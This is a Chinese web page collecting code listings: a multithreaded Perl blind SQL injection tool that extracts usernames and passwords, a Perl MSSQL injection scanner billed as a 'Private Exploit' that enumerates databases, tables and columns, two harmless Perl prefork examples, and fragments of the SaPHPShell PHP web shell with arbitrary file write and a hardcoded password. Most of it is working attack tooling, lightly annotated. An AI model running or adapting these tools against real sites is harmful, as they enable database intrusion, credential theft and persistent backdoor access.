PERL:多线程+中文破解SQL注入猜解机
说明：请把下面代码中所有的 ∮ 都替换为 $（网页为防止变量名被吞掉而做的替换）。另外，HTML 渲染还吃掉了所有尖括号形式的读行操作符，例如 L24 的 `my ∮input=)` 原本是 `my $input=<fieInput>`，L142/L144 读的是 `<STDIN>`，L272 读的是套接字句柄 `<S>`；L66 的 `││` 是 `||`。使用前需一并还原。
#!/usr/local/ActivePerl-5.8/bin/perl -w
use IO::Socket;
use threads;
#函数列表;
# Split the package global $url into the globals $host, $path and $port.
# Accepts "http://host[:port]/path" or "host[:port]/path": the scheme is
# optional, everything after the first "/" becomes the request path.  If
# the URL contains no "/" nothing is assigned.  Results live in globals
# because connect() reads them from there.
sub gethost
{
    return unless $url =~ m{(http://)?(.+?)/(.+)};
    my ($authority, $rest) = ($2, $3);
    $host = $authority;
    $path = "/$rest";
    # "host:port" form: split the port off the host part.
    if ($authority =~ /(.*):(.*)/)
    {
        ($host, $port) = ($1, $2);
    }
}
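# Guess a column name.  For each candidate in the word-list file $_[0] the
# condition "AND exists (select <candidate> from $table_user)" is appended
# to the request (via the global $path1) and sent with connect(); the first
# response whose body matches the global $info regex wins.
# Returns the matching name, or undef when the list is exhausted.
# Reads globals $table_user and $info; writes $path1.
sub fieInput
{
    my ($wordlist) = @_;
    my $field;
    # Three-argument open with a lexical handle: the two-argument form lets a
    # leading ">" or "|" in the file name change the open mode.
    open my $fh, '<', $wordlist or die "can't open file!\n";
    # Loop on definedness rather than on chomp's return value: chomp returns
    # 0 for a final line without a newline, which silently skipped the last
    # word in the original.  (The original's readline was lost to HTML
    # rendering; it read from the bareword handle fieInput.)
    while (defined(my $input = <$fh>))
    {
        chomp $input;
        next if $input eq '';
        my $sql = "exists%20(select%20$input%20from%20$table_user)";
        $path1 = "%20AND%20$sql";
        # &connect() forces the user-defined sub; a bare connect() would be
        # the socket built-in.
        my @res = &connect();
        # $info is interpolated as a regex: metacharacters in it are live.
        if ("@res" =~ /$info/)
        {
            $field = $input;
            print "\t+-- $field --+";
            last;
        }
    }
    close $fh;
    return $field;
}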
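# Guess the user table name.  For each candidate in the word-list file $_[0]
# the condition "AND 0<>(select count(*) from <candidate>)" is appended to
# the request (via the global $path1) and sent with connect(); the first
# response whose body matches the global $info regex wins.
# Returns the matching table name, or undef when the list is exhausted.
# Reads global $info; writes $path1.
sub tabInput
{
    my ($wordlist) = @_;
    my $table;
    # Three-argument open with a lexical handle instead of a bareword handle
    # and the mode-injectable two-argument form.
    open my $fh, '<', $wordlist or die "can't open file!\n";
    # Loop on definedness: the original "while (chomp(my $input=<FH>))"
    # stopped at a final line with no trailing newline and never tested it.
    while (defined(my $input = <$fh>))
    {
        chomp $input;
        next if $input eq '';
        my $sql = "0<>(select%20count(*)%20from%20$input)";
        $path1 = "%20AND%20$sql";
        # &connect() forces the user-defined sub, not the socket built-in.
        my @res = &connect();
        if ("@res" =~ /$info/)
        {
            $table = $input;
            print "\t+-- $table --+\n";
            last;
        }
    }
    close $fh;
    return $table;
}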
# Send one GET for "$path$path1" to $host:$port and return every line of the
# raw response (status line, headers and body together).  Dies when the TCP
# connection cannot be made.  The request text is also left in the global
# $req.  Server-side fingerprint worth knowing: HTTP/1.0, header lines end
# in a bare "\n" (not CRLF), the Referer is just the host name and an empty
# Cookie header is always sent.  No connect or read timeout is set, so a
# silent server blocks the caller (and any thread running this) forever.
# Must be called as &connect() -- "connect" is also a Perl built-in.
sub connect
{
    $req = join '',
        "GET $path$path1 HTTP/1.0\n",
        "Host: $host\n",
        "Referer: $host\n",
        "Cookie: \n\n";
    my $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
    ) or die "Sorry! Could not connect to $host \n";
    print $sock $req;
    my @lines = <$sock>;
    close $sock;
    return @lines;
}
# Binary-style search for the integer value of an injected sub-select.
# Arguments: a list of descending weights (powers of two) followed, as the
# last element, by the URL-encoded sub-select.  For each weight the current
# guess is moved up or down by that weight (direction = result of the
# previous probe), and the server is asked whether "guess < (sub-select)"
# holds, i.e. whether the page still matches the global $info regex.  After
# the last weight a true answer bumps the guess by one.  Returns the guess.
# One HTTP request per weight; writes the global $path1 before each.
sub crack
{
    my @weights = @_;
    my $sql   = pop @weights;
    my $guess = 0;
    my $dir   = 1;
    my $step  = 0;
    for my $weight (@weights)
    {
        print ">";
        $step++;
        $guess += $dir * $weight;
        $path1 = "%20AND%20$guess<($sql)";
        # &connect() forces the user-defined sub, not the socket built-in.
        my @res = &connect();
        if ("@res" =~ /$info/)
        {
            $dir = 1;
            $guess++ if $step == @weights;
        }
        else
        {
            $dir = -1;
        }
    }
    return $guess;
}
# Turn a character code recovered by crack() back into bytes.
# Codes below 256 are packed as one byte.  Larger codes are the absolute
# value of a negative asc() result (the caller asks the database for
# abs(asc(...)) when 0 > asc(...)): the value is negated, printed as hex
# (two's complement), the last four hex digits are kept and packed into
# two bytes -- i.e. the low 16 bits of the original negative code.
sub asc
{
    my ($code) = @_;
    return pack('C*', $code) if $code < 256;
    my $hex = sprintf('%X', -$code);
    $hex = $1 if $hex =~ /(.{4})$/i;
    return pack('H*', $hex);
}
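#----------------------------------------------------------------------
# Main program.  Takes a target URL and a "success" marker ($info, used as
# a regex against the response), then guesses, in order: the user table,
# three column names, the smallest id, the two field lengths and finally
# every character of the user name and password.  Each probe is one HTTP
# request built from these package globals; under ithreads every thread
# gets its own copy of them at creation time.
#----------------------------------------------------------------------
$url='';
$host='';
$path='';
$info='';
$port=80;
# Weight lists for crack(): @dic1 drives the id search, @dic2 the two
# length searches, @dic3 single-byte and @dic4 double-byte character codes.
@dic1=(128,64,32,16,8,4,2,1);
@dic2=(16,8,4,2,1);
@dic3=(64,32,16,8,4,2,1);
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1);
print "\n\n";
print "\t* The script Crack user&pass for Sql-injection system *\n";
print "\t* hemon @ East China Jiaotong Univercity , 2004.5 *\n";
print "\t* E-mail : the108one @ yahoo.com.cn QQ :24303484 *\n";
# Target and marker come from the command line; anything other than exactly
# two arguments falls back to prompting.  (The <STDIN> reads were stripped by
# HTML rendering in the published listing and are restored here.)
$ARGC = @ARGV;
$url = $ARGV[0];
$info = $ARGV[1];
if ($ARGC != 2)
{
    print "\n\t* Please input the url : *\n";
    chomp($url = <STDIN>);
    print "\n\t* Please input the infomation : *\n";
    chomp($info = <STDIN>);
}
&gethost;
print "\n\n开端在 $host 上举行测试,请等候......\n\n";
# Table first (sequential), then the three column word lists in parallel.
print "+-- Table --+";
$table_user=&tabInput('table_user.txt');
print "+-- Filed --+";
my $thread1 = threads->create("fieInput","field_Username.txt");
my $thread2 = threads->create("fieInput","field_password.txt");
my $thread3 = threads->create("fieInput","field_id.txt");
$field_Username = $thread1->join();
$field_password = $thread2->join();
$field_id = $thread3->join();
print "\n\n";
# Smallest id, then both field lengths for that row.
$sql="select%20min($field_id)%20from%20$table_user";
$id=&crack(@dic1,"$sql");
$sql="select%20len($field_Username)%20from%20$table_user%20where%20$field_id=$id";
my $thread4 = threads->create("crack",@dic2,$sql);
$sql="select%20len($field_password)%20from%20$table_user%20where%20$field_id=$id";
my $thread5 = threads->create("crack",@dic2,$sql);
$userlen = $thread4->join();
$passlen = $thread5->join();
# One thread per character position, all started at once: for each position
# first ask whether asc() of the character is negative (0 > asc(...)); if so
# search abs(asc(...)) with the 15-bit weights, otherwise the 7-bit ones.
for (my $locat=1;$locat<=$userlen;$locat++)
{
    $sql="select%20asc(mid($field_Username,$locat,1))%20from%20$table_user%20where%20$field_id=$id";
    $path1 = "%20AND%200>($sql)";
    my @res = &connect();
    if ("@res" =~ /$info/)
    {
        $sql="select%20abs(asc(mid($field_Username,$locat,1)))%20from%20$table_user%20where%20$field_id=$id";
        $username[$locat] = threads->create("crack",@dic4,$sql);
    }
    else
    {
        $username[$locat] = threads->create("crack",@dic3,$sql);
    }
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
    $sql = "select%20asc(mid($field_password,$locat,1))%20from%20$table_user%20where%20$field_id=$id";
    $path1 = "%20AND%200>($sql)";
    my @res = &connect();
    if ("@res" =~ /$info/)
    {
        $sql="select%20abs(asc(mid($field_password,$locat,1)))%20from%20$table_user%20where%20$field_id=$id";
        $password[$locat] = threads->create("crack",@dic4,$sql);
    }
    else
    {
        $password[$locat] = threads->create("crack",@dic3,$sql);
    }
}
# Collect the codes (arrays are 1-based here) and turn them into bytes.
for (my $locat=1;$locat<=$userlen;$locat++)
{
    $username[$locat] = $username[$locat]->join();
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
    $password[$locat] = $password[$locat]->join();
}
print "\n\n\t+-- $field_Username --+\t";
for (my $locat=1;$locat<=$userlen;$locat++)
{
    $username[$locat] = &asc($username[$locat]);
    print "$username[$locat]";
}
print "\n\t+-- $field_password --+\t";
for (my $locat=1;$locat<=$passlen;$locat++)
{
    $password[$locat] = &asc($password[$locat]);
    print "$password[$locat]";
}
print "\n\n";
# "pause" is a cmd.exe builtin; on other platforms this just fails.
system('pause');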
=================
#!/usr/bin/perl
#Private Exploit!Don't distributed it!
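$|=1;
use Socket;
use Getopt::Std;
# Options: -h host, -p port, -w path, -t scan type, -d database, -i table id.
getopt('hpwtdi');
# The published listing defaulted -h and -w to a real third-party site, so
# running it with no arguments scanned that host.  A scanner must not carry
# a built-in live target: both are required and the script stops without them.
$host=$opt_h;
$port=$opt_p || 80;
$path=$opt_w;
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
usage();
if (!defined($host) || $host eq '' || !defined($path) || $path eq '') {
    die "\n-h <host> and -w <path> are required.\n";
}
if($type eq "table_scan")
{
    scan_db();
    print "\nDatabase name scan complete!\n===================================\n";
    print "$_\n" foreach @sqldb;
    print "===================================\n";
    scan_table(@sqldb);
    for(my $i=0;$i<@sqldb;$i++)
    {
        print "\n\n============== $sqldb[$i] ==============\n\n";
        # scan_table() joins names and ids with "\n".  The listing split on
        # /n/ (the letter), which mangled every name containing an "n".
        my @tb=split(/\n/,$table_name[$i]);
        my @tbid=split(/\n/,$table_id[$i]);
        for(my $j=0;$j<@tb;$j++)
        {
            print "| $tb[$j]($tbid[$j])\t";
        }
    }
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
    # -d and -i are passed straight into the injected query; they are
    # operator input, not validated.
    scan_columns($database,$tab_id);
    print "\n============== $database.dbo.$tab_id ==============\n\n";
    print "| $_\t" foreach @columns;
}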
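# Open a TCP connection to the global $host:$port, write the raw request
# text $req and return every line the server sends back.  Dies on resolver,
# socket or connect failure.  No timeout is set on any step.  (The readline
# on the socket was stripped by HTML rendering in the listing; restored.)
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems\n");
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("Socket problems\n");
    # sockaddr_in() builds the address portably; the listing hand-packed it
    # with pack("SnA4x8", 2, ...), which assumes the Linux/SysV sockaddr layout.
    connect($sock, sockaddr_in($port, $target)) || die("Can't connect...\n");
    # Unbuffered so the whole request is on the wire before we block reading.
    my $prev = select($sock);
    $| = 1;
    select($prev);
    print {$sock} $req;
    my @res = <$sock>;
    close($sock);
    return @res;
}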
# Enumerate database names from master.dbo.sysdatabases by walking dbid
# upward from 7 (1..6 are skipped -- presumably the system databases) until
# findstr() returns its "not found" sentinel.  Each name is appended to the
# global @sqldb.  The "name>1" comparison forces a string-to-int conversion
# whose error message quotes the name; findstr() lifts it out of the page.
sub scan_db
{
    my $dbid = 7;
    # The listing wrote "my $req,$get;", which declares only $req.
    my ($req, $get, @res);
    my $db = 1;
    while ($db ne "not found")
    {
        $get = $path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$dbid)";
        $req = make_request($get);
        @res = sendraw($req);
        $db  = findstr(@res);
        push @sqldb, $db if $db ne "not found";
        $dbid++;
    }
}
# Pull the leaked value out of a Chinese-locale MSSQL conversion error.
# Scans the response lines for one containing "char 值" ... "转换", splits
# that line on single quotes and returns the first quoted token with its
# spaces removed.  Tokens of length 0 or 1 are ignored (so a one-character
# name is reported as missing), and only the first quote pair on the line
# is considered.  Returns the literal string "not found" when no line
# qualifies.  Prints "." for every matching line as progress output.
sub findstr
{
    my @lines = @_;
    for my $line (@lines)
    {
        next unless $line =~ /char 值.*转换/isg;
        my (undef, $quoted) = split(/'/, $line);
        $quoted =~ s/ //isg;
        print ".";
        return $quoted if length($quoted) > 1;
    }
    return "not found";
}
# For every database name in @_, list its user tables (sysobjects xtype='U')
# and their object ids.  Names go into $table_name[$i] and ids into
# $table_id[$i], each as a "\n"-joined string, where $i is the position of
# the database in the argument list.  Each table is obtained with
# "top 1 name ... not in (<names seen so far>)" until findstr() returns the
# "not found" sentinel; the id query compares uid with str(id), presumably
# to provoke the same conversion error with the id in it.  The first name
# is recorded even when it is "not found".
sub scan_table
{
    my @db = @_;
    # The listing wrote "my $req,$get;", which declares only $req.
    my ($req, $get, @res);
    my $i = 0;
    foreach my $db_name (@db)
    {
        $get = $path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U')";
        $req = make_request($get);
        @res = sendraw($req);
        my $table = findstr(@res);
        $table_name[$i] .= "$table\n";
        $get = $path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)))";
        $req = make_request($get);
        @res = sendraw($req);
        $table_id[$i] .= findstr(@res) . "\n";
        my $seen = "'$table'";
        while ($table ne "not found")
        {
            $get = $path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($seen))";
            $req = make_request($get);
            @res = sendraw($req);
            $table = findstr(@res);
            if ($table ne "not found")
            {
                $table_name[$i] .= "$table\n";
                $get = $path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)))";
                $req = make_request($get);
                @res = sendraw($req);
                $table_id[$i] .= findstr(@res) . "\n";
            }
            $seen .= ",'$table'";
        }
        print "\nDatabase \"$db_name\" scan complete!\n";
        $i++;
    }
}
# List the column names of one table: $_[0] is the database name, $_[1] the
# object id (as printed by table_scan).  Works like scan_table(): "top 1
# name ... not in (<seen>)" against syscolumns until findstr() returns its
# "not found" sentinel.  Names are appended to the global @columns (the
# first one even when it is "not found"); $column is left as a global.
sub scan_columns
{
    my ($this_db_name, $this_table_id) = @_;
    # The listing wrote "my $get,$req,$tmpstr;", which declares only $get.
    my ($get, $req, @res);
    $get = $path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id)";
    $req = make_request($get);
    @res = sendraw($req);
    $column = findstr(@res);
    push @columns, $column;
    my $seen = "'$column'";
    while ($column ne "not found")
    {
        $get = $path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($seen))";
        $req = make_request($get);
        @res = sendraw($req);
        $column = findstr(@res);
        if ($column ne "not found")
        {
            push @columns, $column;
            $seen .= ",'$column'";
        }
    }
}
# Build the raw HTTP/1.0 GET for $_[0] against the global $host.
# The request carries only a "HOST:" header (upper case, no space after the
# colon) and no User-Agent -- an easy server-side fingerprint.
sub make_request
{
    my ($getstr) = @_;
    return "GET $getstr HTTP/1.0\r\n"
         . "HOST:$host\r\n\r\n";
}
# Print the option summary.  $0 is interpolated; the leading and trailing
# newlines of the original qq~...~ block are preserved.
sub usage
{
    print <<"USAGE";

===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask
===================================================
Usage: $0 -h [-p ] -w -t [-d -i ]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: $0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
USAGE
}
==============
#!/usr/bin/perl
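use strict;
use IO::Select;
use POSIX qw(WNOHANG);
#--- how many worker processes to fork up front
use constant PREFORK_CHILDREN => 3;
# debugging information: print progress to STDERR
use constant DEBUG => 1;
# declare globals
my $DONE=0; # set flag to true when server done
# child status information: child pid forms the key, status the value.
# (The listing wrapped this comment onto a bare line, which is a syntax error.)
my %STATUS = ();
#--- pid of every live child
my %CHILDREN = ();
#--- interrupt handlers: leave the main loop
$SIG{TERM} = $SIG{INT}=$SIG{HUP} = sub { $DONE++ };
#--- reap exited children and forget their pid
$SIG{CHLD} = sub {
    while((my $child=waitpid(-1,WNOHANG)) > 0){
        delete $CHILDREN{$child};
    }
};
# create a pipe for IPC: children write "<pid> <status>\n" lines into it.
# The parent keeps CHILD_WRITE open too, so it will never see EOF on
# CHILD_READ; it relies on %CHILDREN emptying instead.
pipe(CHILD_READ,CHILD_WRITE) or die "Can't make pipe!\n";
my $IN = IO::Select->new(\*CHILD_READ);
# prefork some children
make_new_child() for (1..PREFORK_CHILDREN);
# main loop
while(!$DONE){
    # can_read blocks until a child has written (a signal interrupts it,
    # after which $DONE is re-checked)
    if ($IN->can_read){ # got a message from one of the children
        my $message;
        next unless sysread(CHILD_READ,$message,4096);
        # may contain several messages; a line cut in half by the 4096-byte
        # read would not be reassembled and its halves fail the pattern below
        my @messages = split "\n",$message;
        # retrieve every pid and status code
        foreach (@messages){
            next unless my ($pid,$status) = /^(\d+) (.+)$/;
            # change status
            if($status ne "done"){
                $STATUS{$pid} = $status;
            }else{
                # delete pid
                delete $STATUS{$pid};
            }
        }
    }
    warn join(' ',map {"$_=>$STATUS{$_}"} keys %STATUS),"\n" if DEBUG;
    last unless %CHILDREN
}
warn "Termination received, killing children\n" if DEBUG;
#------------- kill every child process
kill TERM => keys %CHILDREN;
# Poll rather than sleep() with no argument: a SIGCHLD that arrives between
# the %CHILDREN test and the sleep would otherwise leave the parent blocked
# until some unrelated signal arrives.
sleep 1 while %CHILDREN;
warn "Normal termination.\n";
exit 0;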
#---- 创建新的Process
# Fork one worker.  The parent records the pid in %CHILDREN and returns; the
# child closes the read end of the pipe, runs do_child() and exits.
# Note: a child that exits before the parent stores its pid would be reaped
# by the CHLD handler first, leaving a stale %CHILDREN entry behind.
sub make_new_child{
    my $pid = fork();
    die "can't fork :$!" unless defined $pid;
    if ($pid) { # non-zero in the parent
        $CHILDREN{$pid} = 1;
        warn "launching child $pid\n" if DEBUG;
        return;
    }
    close CHILD_READ; # the child only ever writes
    do_child();
    exit 0;
}
#------ child process
# Worker body.  Reports "<pid> idle", "<pid> busy" and "<pid> done" to the
# parent over CHILD_WRITE, with two empty counting loops standing in for
# real work.  The inherited TERM handler only bumps $DONE, which nothing in
# here reads, so a TERM from the parent does not shorten the run.
sub do_child{
    my $report = sub { syswrite CHILD_WRITE, "$$ $_[0]\n" };
    $report->('idle');
    1 for 1..1000000;
    $report->('busy');
    1 for 1..1000000;
    $report->('done');
}
==============
#!/usr/bin/perl -w
# p_shm.pl
#---- 加载 module包罗IPC::Shareable
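use strict;
use POSIX qw(WNOHANG);
use IPC::Shareable;
#---- constants
use constant PREFORK_CHILDREN => 3;
#--- glue key identifying the shared memory segment; any process on the host
#--- that knows it can try to attach, so the segment is created mode 0600.
use constant SHM_GLUE => 'PERF';
#--- print progress to STDERR
use constant DEBUG => 1;
#--- globals
my $DONE = 0; # set flag to true when server done
#--- child status, keyed by pid, held in shared memory (tied below)
my %STATUS = ();
my %CHILDREN=();
#--- INT/TERM leave the main loop; ALRM is only used to interrupt sleep
$SIG{INT} = $SIG{TERM}= sub{ $DONE++ };
$SIG{ALRM} = sub {}; # receive alarm clock signals, but do nothing
#--- reap exited children and forget their pid
$SIG{CHLD} = sub {
    while((my $child=waitpid(-1,WNOHANG)) > 0){
        delete $CHILDREN{$child};
    }
};
# create a shared memory segment for child status: owner-only (0600),
# must not already exist, removed again when this process exits
tie(%STATUS,'IPC::Shareable',SHM_GLUE,
    { create =>1,exclusive=>1,destroy=>1,mode=>0600})
    or die "Can't tie \%STATUS to shared memory: $!";
# prefork some children
make_new_child() for(1..PREFORK_CHILDREN); # prefork children
#-- Main loop: children poke us with ALRM whenever they change state.
# A bounded sleep is used because a CHLD or ALRM landing between the
# %CHILDREN test and an unbounded sleep() would otherwise block the parent
# until the next signal, which after the last child has exited never comes.
while(!$DONE){
    sleep 1;
    warn join(' ',map{"$_=>$STATUS{$_}"} keys %STATUS),"\n" if DEBUG;
    unless(%CHILDREN){ last; }
}
warn "Termination received, killing children\n" if DEBUG;
#------------- kill every child process
kill TERM => keys %CHILDREN;
sleep 1 while %CHILDREN;
warn "Normal termination.\n";
exit 0;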
#---- 给launch_child cleanup child code
# Fork one worker.  Parent: log and record the pid in %CHILDREN.  Child: run
# do_child() and exit.  Unlike the pipe version there is nothing to close
# here; the child attaches to the shared segment itself.
sub make_new_child{
    my $pid = fork();
    die "can't fork :$!" unless defined $pid;
    if ($pid) { # non-zero in the parent
        warn "launching child $pid\n" if DEBUG;
        $CHILDREN{$pid} = 1;
        return;
    }
    do_child();
    exit 0;
}
#--- 实行accept() loop fro each child ---
# Worker body.  Attaches to the parent's shared-memory hash (same glue key,
# no create), then publishes 'idle', 'busy' and 'done' under its own pid,
# sending the parent ALRM after each change so its sleep() returns.  The
# two empty counting loops stand in for work.  The 'done' entry is never
# removed; cleanup_child() exists for that but nothing calls it.
sub do_child{
    my %status;
    tie(%status,'IPC::Shareable', SHM_GLUE)
        or die "Child $$: can't tiel \%status to shared memory: $!";
    my $announce = sub {
        $status{$$} = $_[0];
        kill ALRM => getppid();
    };
    $announce->('idle');
    1 for 1..1000000;
    $announce->('busy');
    1 for 1..1000000;
    $announce->('done');
    warn "child $$: done\n" if DEBUG;
}
#---- delete the child's PID from %STATUS.
# Forget a child's status entry in the shared %STATUS hash.
# Defined but not called anywhere in this listing.
sub cleanup_child{
    my ($pid) = @_;
    delete $STATUS{$pid};
}
======================
error_reporting(7);
// Emulate register_globals when the server has it off: every POST field
// that is not already a global becomes one (EXTR_SKIP keeps existing names).
// This is a deliberate mass-assignment of request data into global scope --
// the classic variable-injection weakness register_globals was removed for.
$onoff = function_exists('ini_get')
    ? ini_get('register_globals')
    : get_cfg_var('register_globals');
if ($onoff != 1) {
    @extract($_POST, EXTR_SKIP);
}
// 去除本义字符
// 可以解决magic_quotes_gpc的限制
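// Recursively strip magic_quotes backslashes from an array, in place.
// Keys named 'argc'/'argv' and all-upper-case non-numeric keys are left
// untouched (presumably to spare environment-style globals).  Returns the
// same array.  The original iterated with each(), which PHP 8 removed;
// foreach over the key/value pairs is equivalent here because every write
// is to an existing key.
function stripslashes_array(&$array) {
    foreach ($array as $key => $var) {
        $skip = $key == 'argc' || $key == 'argv'
            || (strtoupper($key) == $key && '' . intval($key) != "$key");
        if ($skip) {
            continue;
        }
        if (is_string($var)) {
            $array[$key] = stripslashes($var);
        }
        if (is_array($var)) {
            $array[$key] = stripslashes_array($var);
        }
    }
    return $array;
}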
// 果断目录权限
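// Report whether $dir can be written to by the web server user.
// Creates the directory when missing -- with mode 0777, i.e. world-writable
// before umask -- then writes and removes a probe file "test.test".
// Returns 1 when the probe file could be opened, 0 otherwise (the original
// returned an undefined variable when $dir was not a directory).
function dir_writeable($dir) {
    $writeable = 0;
    if (!is_dir($dir)) {
        @mkdir($dir, 0777);
    }
    if (is_dir($dir)) {
        if ($fp = @fopen("$dir/test.test", 'w')) {
            @fclose($fp);
            @unlink("$dir/test.test");
            $writeable = 1;
        }
    }
    return $writeable;
}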
// Undo magic_quotes_gpc escaping so POST data is handled raw.
if (get_magic_quotes_gpc()) {
    $_POST = stripslashes_array($_POST);
}
// Can the directory this script lives in be written to?
$dir_writeable = dir_writeable(str_replace('\\', '/', dirname(__FILE__)))
    ? '可写'
    : '不可写';
// "create" action: write POST 'filedate' to the path in POST 'filename'.
// The path is not validated and no authentication is visible in this
// listing, so this is an arbitrary file write as the web server user.
// (The echoed HTML was stripped when the listing was published.)
if ($_POST['action'] == "create") {
    if (file_exists($_POST['filename'])) {
        echo "";
        echo "";
        exit;
    }
    $fp = @fopen($_POST['filename'], "wb");
    $content = $_POST['filedate'];
    $fw = @fwrite($fp, $content);
    if ($fw) {
        echo "";
    } else {
        echo "";
    }
    @fclose($fp);
}
?>
SaPHPShell Version 1.0
if (!get_cfg_var("safe_mode")){
?>
}
?>
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved. Get the latest version at
href="http://www.4ngel.net" target="_blank">www.4ngel.net.
Powered by SaPHPShell Version 1.5
===================
error_reporting(7);
ob_start();
// Page timer start.
list($usec, $sec) = explode(' ', microtime());
$starttime = $sec + $usec;
/*===================== 程序配置 =====================*/
// check: "1" requires a password, anything else skips authentication.
// checkmode: "1" uses a PHP session, anything else a plain cookie.
// pass: the shared secret, stored in clear text in this file.
$admin = array(
    'check'     => "1",
    'checkmode' => "1",
    'pass'      => "angel",
);
/*===================== 配置竣事 =====================*/
// Emulate register_globals when it is off: POST and then GET fields become
// globals unless the name already exists.  $admin is assigned above, so
// EXTR_SKIP keeps a request from overriding it, but every other undefined
// name is reachable from the request.
$onoff = function_exists('ini_get')
    ? ini_get('register_globals')
    : get_cfg_var('register_globals');
if ($onoff != 1) {
    @extract($_POST, EXTR_SKIP);
    @extract($_GET, EXTR_SKIP);
}
/*===================== 身份验证 =====================*/
// Password gate.  Both modes compare the submitted value to the clear-text
// $admin['pass'] with loose ==.  Cookie mode stores that same clear-text
// password in the browser cookie (no HttpOnly/Secure flags) and trusts it
// on every later request.  loginpage() is defined elsewhere; nothing here
// stops execution after calling it, so it presumably exits itself.
// session_is_registered() was removed in PHP 5.4.
if ($admin['check'] == "1") {
    if ($admin['checkmode'] == "1") {
        /*------- session 验证 -------*/
        session_start();
        if ($_GET['action'] == "logout") {
            session_destroy();
            echo "";
            echo "注销成功......三秒后主动加入或单击这里加入程序界面>>>
";
            exit;
        }
        if ($_POST['action'] == "login") {
            $adminpass = trim($_POST['adminpass']);
            if ($adminpass == $admin['pass']) {
                $_SESSION['adminpass'] = $admin['pass'];
                echo "";
                echo "登岸成功......三秒后主动跳转或单击这里进入程序界面>>>
";
                exit;
            }
        }
        $authed = session_is_registered('adminpass')
            && $_SESSION['adminpass'] == $admin['pass'];
        if (!$authed) {
            loginpage();
        }
    } else {
        /*------- cookie 验证 -------*/
        if ($_GET['action'] == "logout") {
            setcookie("adminpass", "");
            echo "";
            echo "注销成功......三秒后主动加入或单击这里加入程序界面>>>
";
            exit;
        }
        if ($_POST['action'] == "login") {
            $adminpass = trim($_POST['adminpass']);
            if ($adminpass == $admin['pass']) {
                // one-day cookie carrying the password itself
                setcookie("adminpass", $admin['pass'], time() + (1 * 24 * 3600));
                echo "";
                echo "登岸成功......三秒后主动跳转或单击这里进入程序界面>>>
";
                exit;
            }
        }
        $authed = isset($_COOKIE['adminpass'])
            && $_COOKIE['adminpass'] == $admin['pass'];
        if (!$authed) {
            loginpage();
        }
    }
}//end check